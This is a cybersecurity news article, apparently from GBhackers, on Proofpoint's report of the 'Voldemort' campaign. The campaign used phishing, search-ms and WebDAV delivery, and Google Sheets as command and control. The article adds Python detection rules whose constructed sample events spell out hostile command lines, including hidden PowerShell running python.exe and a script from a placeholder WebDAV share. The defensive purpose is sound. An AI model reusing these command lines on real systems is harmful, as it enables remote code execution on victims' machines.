Thursday, February 6, 2025

Voldemort Threat Actors Abusing Google Sheets to Attack Windows Users 


Researchers from Proofpoint have uncovered a sophisticated cyberattack campaign leveraging Google Sheets as a command and control (C2) platform.

Dubbed “Voldemort” by the researchers, this campaign targets Windows users globally, employing a novel attack chain that combines both common and rare techniques to deliver custom malware.

This article delves into the intricacies of the campaign, its implications, and the broader cybersecurity challenges it presents.

Unveiling the Voldemort Campaign

Proofpoint researchers identified an attack campaign that stands out due to its unique use of Google Sheets for C2 operations.

The malware, internally named “Voldemort,” is a custom backdoor written in C, capable of gathering information and deploying additional payloads.

The attack chain involves a series of sophisticated techniques, including the abuse of Google Sheets, which is relatively uncommon in the threat landscape.


The campaign began on August 5, 2024, and involved over 20,000 malicious messages targeting more than 70 organizations worldwide.

The threat actors impersonated tax authorities from various countries, including the U.S., UK, France, Germany, Italy, India, and Japan.

These emails, written in the language of the impersonated authority, were sent from compromised domains, adding a layer of authenticity to the phishing attempts.

Emails impersonating HMRC and DGFIP

Attack Chain Mechanics

The emails contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button, the page checked the user’s browser for a Windows environment.

If detected, the victim was redirected to a TryCloudflare-tunneled URI, prompting the opening of Windows Explorer.

This stealthy redirection technique allowed the malware to masquerade as a local PDF file, increasing the likelihood of user interaction.

InfinityFree hosted a landing page

Technical Analysis of the Malware

The Voldemort campaign exploits the Windows search protocol (search-ms) to display remote files as if they were local.

This technique, used to deploy remote access trojans (RATs), is becoming increasingly popular among cybercriminals. The campaign also utilizes saved search file formats (.search-ms) to further obscure the malicious activity.

HTML Redirect Logic embedded on a landing page

Execution and Payload Delivery

If the victim executes the malicious LNK file, it triggers a PowerShell command to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host.

This script collects system information and sends it to the threat actor’s infrastructure. The malware then downloads a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.
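The execution chain above leaves a distinctive trail in process-creation telemetry: Explorer opening a search-ms: URI that points at a remote location, and PowerShell launching python.exe straight from a WebDAV share. The following detection logic is an added example written for this article, not code from Proofpoint or from the campaign; the Sysmon-style events, hostnames and paths are constructed placeholders.

```python
import re

# Constructed Sysmon Event ID 1 style process-creation events (not real telemetry).
# The WebDAV host is a placeholder; the remote path layout mirrors the chain described above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": r'explorer.exe "search-ms:query=TaxDocument&crumb=location:\\webdav.example.invalid@SSL\DavWWWRoot\ir"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "& \\webdav.example.invalid@SSL\DavWWWRoot\python\python.exe \\webdav.example.invalid@SSL\DavWWWRoot\ir\s.py"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"\\webdav.example.invalid@SSL\DavWWWRoot\python\python.exe",
     "cmdline": r'\\webdav.example.invalid@SSL\DavWWWRoot\python\python.exe \\webdav.example.invalid@SSL\DavWWWRoot\ir\s.py'},
    {"parent": r"C:\Windows\explorer.exe",           # benign: locally installed Python
     "image": r"C:\Program Files\Python312\python.exe",
     "cmdline": r'python.exe C:\Users\alice\report.py'},
]

# search-ms: URI whose crumb=location points at a UNC (remote) path rather than a local folder.
SEARCH_MS_REMOTE = re.compile(r'search-ms:[^"]*crumb=location:\\\\', re.IGNORECASE)
# Any \\host[@SSL]\DavWWWRoot path, the form the WebDAV mini-redirector uses.
WEBDAV_PATH = re.compile(r'\\\\[^\\\s"]+\\DavWWWRoot', re.IGNORECASE)


def classify(event):
    """Return the detection names a single event triggers (empty list if nothing fires)."""
    hits = []
    cmd, image, parent = event["cmdline"], event["image"], event["parent"].lower()
    if SEARCH_MS_REMOTE.search(cmd):
        hits.append("search-ms pointing at a remote location")
    if image.startswith("\\\\"):
        hits.append("process image executed from a UNC path")
    if WEBDAV_PATH.search(cmd) or WEBDAV_PATH.search(image):
        hits.append("WebDAV (DavWWWRoot) path in command line or image")
    if parent.endswith("powershell.exe") and image.lower().endswith("python.exe") and image.startswith("\\\\"):
        hits.append("PowerShell launching python.exe from a network share")
    return hits


def detect(events):
    """Return (index, detections) for every event that triggers at least one rule."""
    flagged = []
    for i, e in enumerate(events):
        hits = classify(e)
        if hits:
            flagged.append((i, hits))
    return flagged
```

The benign local Python launch in the sample set is there to show the rules key on the remote location, not on python.exe itself.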

Shortcut masquerading as a PDF

The Role of Google Sheets in C2 Operations

Leveraging Google Infrastructure

Rather than using dedicated or compromised infrastructure, the Voldemort malware utilizes Google Sheets for C2, data exfiltration, and command execution.

By authenticating with Google Sheets using a client token, the malware can read and write data, effectively using the platform as a communication channel with the threat actors.

The malware supports a range of commands, including file operations and system commands, all executed via Google Sheets.

The actors can issue commands to the bot, which reports back with status messages, including the malware’s name, “Voldemort.”
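Because the C2 channel is the Google Sheets API itself, the useful signal on the endpoint is which process is talking to it: a browser or the Drive client is expected, a freshly dropped executable is not. The grouping logic below is an added example written for this article, not Proofpoint's or the malware's code; the events are constructed, the process allow-list is an assumption to tune per environment, and oauth2.googleapis.com is assumed as the token endpoint the "client token" authentication would use.

```python
import ntpath

# Google API hosts a Sheets-based C2 channel would reach. sheets.googleapis.com is the Sheets
# REST endpoint; oauth2.googleapis.com is assumed here as the token endpoint.
SHEETS_C2_HOSTS = {"sheets.googleapis.com", "oauth2.googleapis.com"}

# Assumed allow-list of processes that legitimately use Google APIs on a managed host.
ALLOWED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "googledrivefs.exe"}

# Constructed Sysmon Event ID 3 style network-connection events (not real telemetry).
SAMPLE_CONNECTIONS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest": "sheets.googleapis.com", "port": 443},
    {"image": r"C:\Users\alice\AppData\Local\Temp\legit_app.exe", "dest": "oauth2.googleapis.com", "port": 443},
    {"image": r"C:\Users\alice\AppData\Local\Temp\legit_app.exe", "dest": "sheets.googleapis.com", "port": 443},
    {"image": r"C:\Users\alice\AppData\Local\Temp\legit_app.exe", "dest": "sheets.googleapis.com", "port": 443},
    {"image": r"C:\Windows\System32\svchost.exe", "dest": "update.example.invalid", "port": 443},
]


def suspicious_sheets_clients(events):
    """Group Sheets/OAuth connections by process image, dropping allow-listed clients.

    Returns {image_path: {"hosts": set_of_hosts, "count": n}} so the analyst sees the
    token fetch and the spreadsheet reads/writes attributed to the same binary.
    """
    by_image = {}
    for e in events:
        dest = e["dest"].lower()
        if dest not in SHEETS_C2_HOSTS:
            continue
        # ntpath handles the Windows separators regardless of the analysis host's OS.
        if ntpath.basename(e["image"]).lower() in ALLOWED_CLIENTS:
            continue
        entry = by_image.setdefault(e["image"], {"hosts": set(), "count": 0})
        entry["hosts"].add(dest)
        entry["count"] += 1
    return by_image


def full_c2_pattern(events):
    """Images that both obtained a token and touched the Sheets API: the strongest signal."""
    return [img for img, v in suspicious_sheets_clients(events).items()
            if v["hosts"] >= SHEETS_C2_HOSTS]
```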

Decrypted status messages

Implications and Challenges

APT Activity with Cybercrime Characteristics

Proofpoint assesses with moderate confidence that the Voldemort campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering.

Despite its espionage-like capabilities, the campaign’s volume and targeting align more closely with cybercriminal activities, presenting a unique blend of threats.

PCAP of pingb.in traffic

The abuse of cloud services like Google Sheets for malicious purposes highlights a growing trend in the cyber threat landscape.

Such tactics allow threat actors to leverage legitimate infrastructure, making detection and mitigation more challenging for cybersecurity professionals.

Manual browsing of WebDAV share

The Voldemort campaign represents a significant evolution in cyberattack strategies, combining sophisticated techniques with innovative cloud-based services for malicious purposes.

As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats.

Using Google Sheets as a C2 platform underscores the need for stronger security measures and awareness that legitimate cloud services can be misused for cyberattacks.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
